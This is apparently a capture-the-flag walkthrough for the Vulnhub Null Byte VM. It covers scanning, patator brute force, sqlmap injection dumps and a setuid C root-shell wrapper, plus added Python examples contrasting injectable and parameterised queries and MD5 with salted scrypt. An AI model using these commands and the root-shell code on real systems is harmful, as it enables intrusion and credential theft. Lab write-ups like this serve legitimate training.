NullByte Walkthrough
Here's my attempt to provide walkthroughs for various VMs from Vulnhub & HTB.
Null Byte (Vulnhub)
First off we need to identify the IP address the VM spun up on:
$ nmap -sn 192.168.1.0/24
We will need the following code if we encounter a SUID binary (it is a setuid wrapper that spawns a root shell, so it is only useful once a root-owned SUID binary can be made to run it):
ps.c
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
    /* Drop the effective-only privilege down to a full root uid/gid */
    setuid(0);
    setgid(0);
    /* Replace this process with an interactive bash */
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}
We identify which port(s) are listening on the server: nmap -O -v -sS 192.168.1.142

We notice a web server on port 80. To find out what's listening on port 777 we can use netcat to grab the service banner. Ahh, it's actually the SSH daemon. Once we have a user and a valid password we can attempt to get a shell on the box using: ssh user@192.168.1.142 -p 777

Let's see what other interesting directories we can find by running gobuster with one of the DirBuster wordlists.
gobuster dir -u http://192.168.1.142 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt
Only two directories appear interesting, and there is not much we can do with them: directory listing is disabled on the uploads folder and we need credentials for the phpmyadmin page.

Here most people, including me, didn't know that the next step would be to analyze the default image displayed on the home page.

The sentence is from an ancient Egyptian proverb. If we run the image (a GIF in this case) through an EXIF tool we can read any text hidden in the image's metadata.

After some consideration, this text string is actually a directory on the web server. At first glance it's asking for some key. Here one can only resort to brute force to see if it's a simple key. Viewing the page source reveals something along the lines of: <!-- this form isn't connected to mysql, password ain't that complex --!>

patator http_fuzz url=http://192.168.1.142/kzMb5nVYJw/index.php method=POST body='key=FILE0' 0=/home/kali/10k-most-common.txt follow=1 -x ignore:fgrep='invalid key'

Next we move on to the page just revealed. We put in a search term and it reveals a user called ramses.

Just browsing to the URL (or using curl http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=) we get the following results:
EMP ID :1 EMP NAME : ramses
EMP POSITION :
EMP ID :2 EMP NAME : isis
EMP POSITION : employee
Fetched data successfully
These could be two possible users on the system. Next we need to check whether the page is vulnerable to SQL injection. The quickest way is sqlmap:
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch= --dbs
Lo and behold, we can see all the databases:
[10:45:14] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch='DESCRIBE phpmyadmin' --dbs --dump
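The search page is injectable because the usrtosearch value is pasted straight into the query text. The following is an added example (not code from the VM or from the walkthrough) that reproduces that defect against an in-memory SQLite stand-in for the MySQL table, and places the parameterised fix beside it. The table name emp, the column names and the two rows are constructed to mirror the output shown above; the LIKE-based query shape is an assumption about how the original page is written.

```python
import sqlite3

# Constructed sample data modelled on the two records the search page returned
EMPLOYEES = [(1, "ramses", ""), (2, "isis", "employee")]


def make_db():
    """In-memory SQLite stand-in for the MySQL table behind 420search.php (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE emp (id INTEGER, name TEXT, position TEXT)")
    con.executemany("INSERT INTO emp VALUES (?, ?, ?)", EMPLOYEES)
    return con


def search_vulnerable(con, usrtosearch):
    """Builds the query by string concatenation, so the parameter can alter SQL syntax."""
    sql = ("SELECT id, name, position FROM emp WHERE name LIKE '%"
           + usrtosearch + "%'")
    return con.execute(sql).fetchall()


def search_safe(con, usrtosearch):
    """Binds the parameter as data; the wildcard pattern is built in Python, not in SQL."""
    sql = "SELECT id, name, position FROM emp WHERE name LIKE ?"
    return con.execute(sql, ("%" + usrtosearch + "%",)).fetchall()


def compare(usrtosearch):
    """Return (rows from the vulnerable handler, rows from the safe handler) for one input."""
    con = make_db()
    try:
        vuln = search_vulnerable(con, usrtosearch)
    except sqlite3.OperationalError as err:
        # A syntax error caused by a stray quote is the classic symptom of
        # injectable string concatenation (it is what sqlmap's probes look for)
        vuln = ("SQL error: " + str(err),)
    return vuln, search_safe(con, usrtosearch)


if __name__ == "__main__":
    # An empty term lists everyone in both versions, exactly as the page observed;
    # the tautology payload lists everyone only in the concatenated version.
    for term in ["", "ramses", "x' OR 'a'='a' -- "]:
        print(repr(term), "->", compare(term))
```

The empty-parameter case matches what the page saw with usrtosearch= left blank: both handlers return every row, because that is what the query legitimately asks for. The difference shows up only once the input contains SQL syntax: the concatenating handler treats it as part of the statement, while the bound-parameter handler searches for the literal text and finds nothing.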

We're presented with a strange hash string next to the username ramses.
We can use the following site to quickly identify the hash type: https://hashes.com/en/tools/hash_identifier. As seen below, it's actually a base64-encoded string.

Running the MD5 hash through CrackStation shows us a possible password:
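Two things make this step work: the stored value is just base64 around a hex MD5 digest, and an unsalted MD5 of a common password is a single table lookup. The following is an added example (not code from the walkthrough or the VM) that classifies a credential string the way the hash identifier did, and contrasts the MD5 column with a salted scrypt store so the fix is visible next to the weakness. The password "example-pw" and all function names are constructed for the example; nothing here is the VM's actual hash.

```python
import base64
import binascii
import hashlib
import hmac
import os
import re

MD5_HEX = re.compile(r"[0-9a-f]{32}")


def identify_hash(value):
    """Classify a credential string as a bare MD5 hex digest, a base64 wrapper
    around one (the shape seen in the dumped table), or unknown (None)."""
    v = value.strip()
    if MD5_HEX.fullmatch(v.lower()):
        return "md5-hex", v.lower()
    try:
        inner = base64.b64decode(v, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None
    if MD5_HEX.fullmatch(inner.lower()):
        return "base64(md5-hex)", inner.lower()
    return None


def wrap_base64(hex_digest):
    """Produce the base64-of-hex form found in the database column."""
    return base64.b64encode(hex_digest.encode("ascii")).decode("ascii")


def md5_store(password):
    """Unsalted MD5: identical passwords give identical digests, so a precomputed
    lookup table (which is all CrackStation is) recovers them instantly."""
    return hashlib.md5(password.encode()).hexdigest()


SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)


def scrypt_store(password, salt=None):
    """Salted, memory-hard hash: the defensive replacement for the MD5 column."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return "scrypt$" + salt.hex() + "$" + key.hex()


def scrypt_verify(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, salt_hex, key_hex = stored.split("$")
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(key.hex(), key_hex)


if __name__ == "__main__":
    pw = "example-pw"  # constructed password, not the VM's
    wrapped = wrap_base64(md5_store(pw))
    print(wrapped, "->", identify_hash(wrapped))
    print("md5 repeats:    ", md5_store(pw) == md5_store(pw))
    print("scrypt repeats: ", scrypt_store(pw) == scrypt_store(pw))
    print("scrypt verifies:", scrypt_verify(pw, scrypt_store(pw)))
```

The identifier relies on the same two cues a human would use: a 32-character hex string, or a base64 blob that decodes to one. The second half shows why the lookup succeeded: md5_store returns the same digest every time, whereas scrypt_store returns a different string for each call because of the random salt, yet scrypt_verify still accepts the right password. A per-user salt removes the shared lookup table, and the memory-hard work factor makes each guess cost real CPU and RAM.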
